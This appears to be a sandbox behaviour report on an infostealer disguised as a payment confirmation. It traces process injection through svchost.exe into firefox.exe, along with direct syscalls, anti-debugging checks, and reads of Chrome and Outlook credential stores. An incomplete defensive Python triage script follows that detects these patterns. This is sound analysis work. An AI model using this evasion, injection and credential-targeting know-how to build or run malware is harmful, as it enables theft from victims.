Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0132FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\SysWOW64\svchost.exe; Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_008C07AC NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0133703C BlockInput
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013146D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013420F6 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_002634A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_00263500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_00261E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_008B0080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_008B00EA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_008D26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0130A937 GetProcessHeap
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01308E19 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01308E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQueryInformationProcess: Direct from: 0x774CFAFA
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtCreateUserProcess: Direct from: 0x774D093E
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtCreateKey: Direct from: 0x774CFB62
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQuerySystemInformation: Direct from: 0x774D20DE
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQueryDirectoryFile: Direct from: 0x774CFDBA
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtWriteVirtualMemory: Direct from: 0x774D213E
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtCreateFile: Direct from: 0x774D00D6
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtSetTimer: Direct from: 0x774D021A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtOpenFile: Direct from: 0x774CFD86
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtSetInformationThread: Direct from: 0x774E9893
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtOpenKeyEx: Direct from: 0x774CFA4A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtAllocateVirtualMemory: Direct from: 0x774CFAE2
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtResumeThread: Direct from: 0x774D008D
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtOpenKeyEx: Direct from: 0x774D103A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtUnmapViewOfSection: Direct from: 0x774CFCA2
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtDelayExecution: Direct from: 0x774CFDA1
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtSetInformationProcess: Direct from: 0x774CFB4A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtSetInformationThread: Direct from: 0x774CF9CE
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtReadFile: Direct from: 0x774CF915
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtMapViewOfSection: Direct from: 0x774CFC72
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtCreateThreadEx: Direct from: 0x774D08C6
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtDeviceIoControlFile: Direct from: 0x774CF931
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtRequestWaitReplyPort: Direct from: 0x753C6BCE
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQueryValueKey: Direct from: 0x774CFACA
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtOpenSection: Direct from: 0x774CFDEA
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtTerminateThread: Direct from: 0x774D00A6
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtProtectVirtualMemory: Direct from: 0x774D005A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtWriteVirtualMemory: Direct from: 0x774CFE36
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtRequestWaitReplyPort: Direct from: 0x756F8D92
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtNotifyChangeKey: Direct from: 0x774D0F92
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQueryAttributesFile: Direct from: 0x774CFE7E
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtReadVirtualMemory: Direct from: 0x774CFEB2
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtSetInformationFile: Direct from: 0x774CFC5A
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; NtQuerySystemInformation: Direct from: 0x774CFDD2
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: execute and read and write
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0131BE95 LogonUserW
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01324B52 SendInput,keybd_event
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01327DD5 mouse_event
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe; Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0131B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0131BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
Source: Payment confirmation 20240911.exe, xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: !Progman
Source: Payment confirmation 20240911.exe; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01307254 cpuid
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformation (8 occurrences)
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_013040DA GetSystemTimeAsFileTime,__aulldiv
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_0135C146 GetUserNameW
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_01312C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe; Code function: 0_2_012FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: Payment confirmation 20240911.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_81
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_XP
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_XPe
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_VISTA
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_7
Source: Payment confirmation 20240911.exe; Binary or memory string: WIN_8
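The two sections above carry the facts an analyst wants first: the cross-process mapping chain (the sample writes an executable section into svchost.exe, which writes into xONxwdydvq.exe, which writes into RMActivate_ssp.exe, which finally writes into firefox.exe), the direct Nt* syscalls that make up that injection primitive, and the Chrome and Outlook credential stores that RMActivate_ssp.exe opens. The following Python script is an added example written for this page, not Joe Sandbox code: it parses a constructed subset of the report's own behaviour lines (in the flattened "Source: <process> <observation>" form the page uses), reconstructs the chain from the "Section loaded" entries with execute protection, lists the direct syscalls that belong to an injection primitive, and tags the credential stores touched. The syscall list and the store list are the example author's own choices, not a Joe Sandbox classification.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample input: a subset of this report's own behaviour lines, in the
# flattened "Source: <process> <observation>" form the page uses.
DROP_DIR = (r"C:\Program Files (x86)"
            r"\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT")
IMPLANT = DROP_DIR + r"\xONxwdydvq.exe"
STEALER = r"C:\Windows\SysWOW64\RMActivate_ssp.exe"
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe Section loaded: "
    r"NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: "
    + IMPLANT + " protection: execute and read and write",
    "Source: " + IMPLANT + " Section loaded: NULL target: " + STEALER
    + " protection: execute and read and write",
    "Source: " + STEALER + r" Section loaded: NULL target: "
    r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write",
    "Source: " + STEALER + r" Section loaded: NULL target: "
    r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write",
    "Source: " + IMPLANT + " NtWriteVirtualMemory: Direct from: 0x774D213E",
    "Source: " + IMPLANT + " NtMapViewOfSection: Direct from: 0x774CFC72",
    "Source: " + IMPLANT + " NtCreateThreadEx: Direct from: 0x774D08C6",
    "Source: " + IMPLANT + " NtClose: Direct from: 0x774CFA02",
    "Source: " + STEALER + r" File opened: "
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    "Source: " + STEALER + r" File opened: "
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies",
    "Source: " + STEALER + r" Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft"
    r"\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"
    r"\9375CFF0413111d3B88A00104B2A6676",
]

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<kind>Section loaded|Memory written|File opened|Key opened|Nt\w+): "
    r"(?P<detail>.*)$"
)
SECTION_RE = re.compile(r"^NULL target: (?P<target>.+?) protection: (?P<prot>.+)$")

# Example author's classification (an assumption, not a Joe Sandbox category): the
# Nt* calls that together make up process hollowing / remote-thread injection.
INJECTION_SYSCALLS = {
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
    "NtMapViewOfSection", "NtUnmapViewOfSection", "NtCreateThreadEx",
    "NtResumeThread", "NtCreateUserProcess",
}
CHROME_STORES = {"Login Data", "Local State", "Web Data", "Cookies"}
OUTLOOK_PROFILES = "\\Windows Messaging Subsystem\\Profiles\\"


def parse(line):
    """Split one flattened report line into (source process, kind, detail), or None."""
    m = LINE_RE.match(line.strip())
    return (m["src"], m["kind"], m["detail"]) if m else None


def injection_chain(lines):
    """Follow executable cross-process section mappings from the root sample outward."""
    edges = {}  # source basename -> target basename (last mapping wins)
    for src, kind, detail in filter(None, map(parse, lines)):
        m = SECTION_RE.match(detail) if kind == "Section loaded" else None
        if m and "execute" in m["prot"]:
            edges[ntpath.basename(src)] = ntpath.basename(m["target"])
    roots = set(edges) - set(edges.values())  # writers that nobody wrote into
    chain = [roots.pop()] if len(roots) == 1 else []
    while chain and chain[-1] in edges and edges[chain[-1]] not in chain:
        chain.append(edges[chain[-1]])
    return chain


def direct_syscalls(lines):
    """Per process, the direct Nt* syscalls that belong to an injection primitive."""
    hits = defaultdict(set)
    for src, kind, detail in filter(None, map(parse, lines)):
        if detail.startswith("Direct from:") and kind in INJECTION_SYSCALLS:
            hits[ntpath.basename(src)].add(kind)
    return {proc: sorted(calls) for proc, calls in hits.items()}


def credential_access(lines):
    """Per process, which browser and mail credential stores were opened."""
    hits = defaultdict(set)
    for src, kind, detail in filter(None, map(parse, lines)):
        proc = ntpath.basename(src)
        if (kind == "File opened" and "\\Google\\Chrome\\User Data\\" in detail
                and ntpath.basename(detail) in CHROME_STORES):
            hits[proc].add("chrome:" + ntpath.basename(detail))
        elif kind == "Key opened" and OUTLOOK_PROFILES in detail:
            hits[proc].add("outlook:mapi-profile")
    return {proc: sorted(stores) for proc, stores in hits.items()}


def triage(lines):
    """One summary dict for a list of report lines."""
    return {
        "injection_chain": injection_chain(lines),
        "direct_syscalls": direct_syscalls(lines),
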